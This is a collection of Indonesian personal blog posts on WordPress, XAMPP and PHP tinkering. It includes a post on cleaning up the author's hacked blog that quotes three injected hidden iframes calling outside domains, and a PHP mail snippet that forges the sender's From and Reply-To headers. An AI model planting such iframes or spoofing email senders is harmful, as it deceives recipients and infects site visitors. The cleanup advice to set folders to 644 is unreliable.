Ditulisan ini sedikitpun aku ngak ada maksud mengajarkan hal yang ngak bener. Hanya untuk sharing berbagi apa yang bisa aku bagi *apa ini maksudnya*

Sebagai studi kasus, kita akan bermain – main di rumah kang Penyo.Web.Id beliau adalah salah satu blogger yang aku seganin. Kebetulan dia juga menggunakan plugin WP-CopyProtect. Secara garis besar WP-CopyProtect mengurangi atau memantau aktifitas mouse. Misalkan tidak dapat memblok atau melakukan klik kanan.

Untuk kasus pertama tidak dapat memblok tulisan pada halaman blog. Kelemahan dari sistem keamanan ini adalah pada script yang digunakan. Plugin ini menggunakan JS aka JavaScript untuk melakukan aksinya. Untuk sekedar informasi saja, untuk JavaScript sebagian besar bekerja setelah loading halaman selesai, nah bagaimana jika proses loading belum selesai prosesnya kita hentikan? hasilnya JavaScript yang berfungsi untuk menjadi pengaman Tidak bekerja sebagaimana mestinya. Maka yang terjadi bisa anda lihat dibawah ini.

Tulisan Tetap bisa di Blok

Selanjutnya pada kasus klik kanan di disabled atau tidak diizinkan, biasanya ini hanya untuk melihat sourcecode yang digunakan. Biasanya jika kita melakukan aksi klik kanan maka akan muncul pesan seperti ini

Alert Pesan

Untuk mengakalinya bisa juga menggunakan cara sebelumnya, atau yang lebih simple lagi lkita bisa gunakan fasilitas dari browser. cukup memilih menu View >> Page Source

maka semua jampi – jampi yang ada diblog untuk pertahanan akan bisa diatasi. Semoga trik nan simple ini tidak disalah gunakan.

Standart

Mouse Over

Sempat menghilangkan sejenak list top komentator di sidebar dengan alasan belum mendapat ide akan dibuat seperti apa. harapannya sih semua yang ada diblog ini selalu berbeda dari yang lainnya. kapan – kapan mau ta’ buat jadi plugin, jadi ngak perlu repot – repot buka koding themes. Buat rekans yang mejeng ditop list top komentatorku ta’ ucapin banyak – banyak terimakasih, Buat yang pingin mejeng silahkeun berkomen ria diblog jablai ini. Tapi inget jangan nyepam loh

Kembali kepokok bahasan, Sering kali kalau kita membuka phpMyAdmin pada browser dengan alamat “http://localhost/phpmyadmin“. Nah seharusnya phpmyadmin ini berada pada folder htdocs. Namun untuk xampp yang sudah satu paket komplit biasanya folder phpMyAdmin berada diluar htdocs.

Nah jika punya project atau kerjaan yang tidak mau dicampur dalam satu folder htdocs kita bisa mengakalinya dengan menambahkan alias pada file “xampp/apache/conf/extra/httpd-xampp.conf” belum sempat mengecek tiap versi apakah sama atau tidak. Selanjutnya cari pada bagian

Alias /phpmyadmin “/xampp/phpMyAdmin/”

<Directory “/xampp/phpMyAdmin”>

AllowOverride AuthConfig

Order allow,deny

Allow from all

</Directory>

Letakkan beberapa baris konfigurasi setelah baris diatas

Alias /test “/xampp/test/”
<Directory “/xampp/test”>
Order Allow,deny
Allow from all
</Directory>

jangan lupa di buat folder “test” diluar folder “htdocs” setelah selesai jangan lupa restart apachenya. Jika sudah berjalan kembali silahkan coba di browser masukkan url “http://localhost/test” silahkan lihat sendiri hasilnya .

Untuk tiap versi mungkin hanya butuh sedikit penyusuaian, untuk apache dilinux mungkin kapan – kapan bisa dicobain*klo inget ya* Semoga bermanfaat. Jika ada kesalahan mohon direvisi.

Kalau dipikir – pikr gampang aja toh, tapi ketika turun kelapangan dengan dihadapkan file – file yang berukuran jumbo ternyata perlakuan istimewa tidak hanya dilakukan pada sisi program namun harus ada sedikit trak utak atik pada bagian konfigurasi di apache.

Dari sumber – sumber lain yang bergentayangan di google, kita cukup merubah file php.ini pada bagian upload_max_filesize = 2M. Kita tinggal merubah 2M menjadi berapa yang kita butuhkan misal 20M. Ternyata tidak semudah itu kawan, walaupun filesize yang dialokasikan besar tapi alokasi variabel POST defaultnya 8Mb. Nah ini dia, kalau file yang kita upload 11 Mb apakah akan dieksekusi oleh PHP? jawabanya tentu saja tidak.

Untuk itu pada bagian post_max_size = 8M diubah sesuai kebutuhan juga. Hal lain yang harus diperhitungkan pada bagian max_execution_time  = 200. Kalau untuk localhost mungkin ngak bakalan jadi masalah. nah kalo ditaroh diserver yang letaknya antah berantah apa bisa upload file 20Mb tembus dalam 2 menit? yah pasti bisalah siapa tau BW nya nyampe 10MBps hehe. Nah kalau BWnya pas – pas makan bisa makan waktu lebih dari 4 sampai 5 bahkan mungkin lebih. Silahkan merubah pada bagian max_execution_time = 200 menjadi sesuai perkiraan waktu yang dibutuhkan, jangan lupa itu satuannya second alias detik.

Yang terakhir setelah file php.ini di perkosa jangan lupa restart apachenya. Semoga membingungkan rekans sekalian hehehe

Pacar.In

Setelah sebelumnya sempat bagi – bagi email gratis pacar.in menggunakan support google apps, kali ini aku dibantu juragan bodsink coba berbagi fasilitas lain yang ngak kalah serunya untuk orang iseng sepertiku. Free Short URL Redirection kalau diartikan kurang lebih artinya penyingkat url panjang (kalau salah mohon dimaafkan ya).

Kalau untuk source yang tinggal gunain sih banyak, tapi kan jauh lebih enak kalau buatan sendiri. Ngak sampai satu jam tak utak atik kode php. Setelah selesai cari template yang sesuai, lirik sedikit punya kang cosaaranda dengan lanjut.in yang gunain PHP ZLink sebagai engginenya. Maklum lagi males – malesnya design layout sendiri. Mungkin ntar kalau ada mut buat design baru deh ta’ ganti

Buat yang penasaran bisa langsung meluncur ke TKP. Ya wis jangan ragu – ragu, sini URL panjangmu ta’ pacar.in hehehe

Berikut contoh potongan program yang bisa kita gunain untuk mengiri email

<?
     mail('emailtujuan@example.com', 'Judul Pesan', 'isi pesan');
?>

Sebenarnya hanya dengan sebaris program PHP diatas kita udah bisa mengirim email ke alamat email yang dituju. Namun biar lebih rapi kita bisa bubuhi sedikit header biar terkesan benar – benar dikirim sang pemilik email

1
2
3
4
5
6
7
8
9

<?php
$to      = 'emailtujuan@example.com';
$subject = 'Judul Pesan';
$message = 'Isi Pesan';
$headers = 'From: heru kurniawan' . "\r\n" .
    'Reply-To: admin@yahoo.com' . "\r\n" .
    'X-Mailer: PHP/' . phpversion();
mail($to, $subject, $message, $headers);
?>

Selesai, jadi jangan kaget jika ada alamat email pengirim yang aneh – aneh. Mungkin bisa jadi dia gunain script serupa untuk mengirimnya. Semoga bermanfaat

Nah, dari uraian diatas aku mencoba membuat gaya tulisan tersebut pada komentar yang ada diblog ini. Jadi rekans ngak perlu harus ribet nekan shift berulang – ulang hanya untuk membuat tulisan besar kecil cukup dengan mencentang pilihan alay text pada form komentar.Sedikit cerita cara pembuatanya, emang ngak terlalu ribet namun minimal harus menguasai bahasa pemrograman PHP. Selain itu karna lama jika harus dibuat ke plugin, jadi aku langsung menyisipkan script tambahanya pada file – file yang berhubungan dengan komentar di wordpress.

Yang penasaran hasilnya gmana silahkan rekans cobain sendiri. Sedikitpun ngak ada maksud untuk mengejek atau merendahkan kepada orang yang dianggap alay karna maklum namanya juga masih abegeh karna aku juga pernah ngerasakanya. Semoga menghibur rekans yang mampir di blog katrok ini.

Nama pluginnya exec-PHP Mungkin buat yang udah tau ini bukan hal yang aneh lagi.  Akunya aja yang katrok baru tau kalau ada plugin keren ini. Hal Yang terpenting adalah kita harus memiliki dasar bahasa pemrograman PHP. Selain itu yang perlu diperhatikan dalam menyisipkan script PHP posisi editor text kita harus dalam mode HTML

Namun sayangnya kita tidak dapat menggunakan class – class yang sudah tersedia dari wordpress, ini karna untuk menjaga keamanan blog agar tidak bisa diobrak – abrik orang lain, kebayangkan kalau satu blog yang dipake rame – rame alias kroyokan ada yang nyisipin script php dipostingannya buat obrak abrik database si blog, silahkan rekans bayangkan sendiri hasilnya gmana. ini mungkin jadi kelemahan yang dijadikan kelebihan plugin ini.

Untuk manualnya cara penggunaannya dapat langsung menuju official sitenya. Untuk yang berminat source code pada postingan 20 Top Komentator 2009 tunggu aja ntar aku akan kasi scriptnya. Semoga bermanfaat bagi yang membutuhkan. hepi koding

Ceritanya begini, Beberapa hari yang lalu blog katrok ini diinggapi virus iframe, aku juga baru menyadari setelah melihat kecepatan load blog ini. Merasa aneh ngak biasanya load blog ini lumayan lama. Sempat berpikir mungkin netnya emang lagi katrok atau servernya lagi kurang sehat. Ternyata setelah nurunin scroll lebih jauh mulai kelihatan penampakan si virus, mungkin yang sempat ngeliat ada iframe dibawah footer blog ini seperti gambar dibawah ini. Murni ini bukan kerjaan iseng aku, tapi kerjaannya si virus iframe.

Penampakan Virus Iframe

Efeknya? Untuk jangka panjang yang mungkin ditimbulkan dari si virus, web/blog yang terinveksi akan dicap sebagai web yang berbahaya. Kalau untuk web/blog untuk mencari rejeki bisa kacau tuh, tapi kalo untuk blog personal kacau juga sih (hehehe).

Bagaimana bisa masuk kehosting kita? Ini masih mungkin ya, berdasar pengalaman yang aku alamin, salah satu penyebabnya adalah dari komputer tempat kita mengupload file-file ke server dengan menggunakan FTP Client. Nah, di OS yang kita pake ngupload itu sudah terinstall worm yang bertugas mencuri konfigurasi FTP yang kita gunakan antara lain alamat host, user name dan password.

contoh kode yang disisipkan si virus ke file index

<iframe src=”http://internetcountercheck.com/?click=12433700? width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

<iframe src=”http://xtrarobotz.com/?click=98E581? width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

<iframe src=”http://peskostruikaz.com/?click=198EA8? width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

Cara Penanganan?

• Ubah Password FTP yang digunakan
• Ubah Permisson Folder menjadi 644
• Cek kembali file – file index yang sudah dibersihkan
• Silahkan kalau ada yang mau nambahin………

Semoga bermanfaat buat yang ngalamin kasus serupa. jika ada yang ngeliat virus itu beraksi lagi diblog ini harap melapor kemarkas

Langsung aja kita ubah koding sebelumnya yang menggunakan bahasa pemrograman PHP menjadi JavaScript

PHP

1
2
3
4

<?php
$angka = rand(1,2);
echo "<img src='".$angka.".jpg'>";
?>

JavaScript

1
2
3
4
5

<script language="JavaScript">
  var ry=Math.floor(Math.random()*3)
	ry = ry+1;
   document.write("<img src='"+ry+".jpg'>")
</script>

Selesai sudah utangku. Yang mau nyobain bisa download filenya disini. Semoga bermanfaat buat yang membutuhkan, buat mase mungil terima kasih udah memberikan aku inspirasi buat posting tulisan baru

heppy coding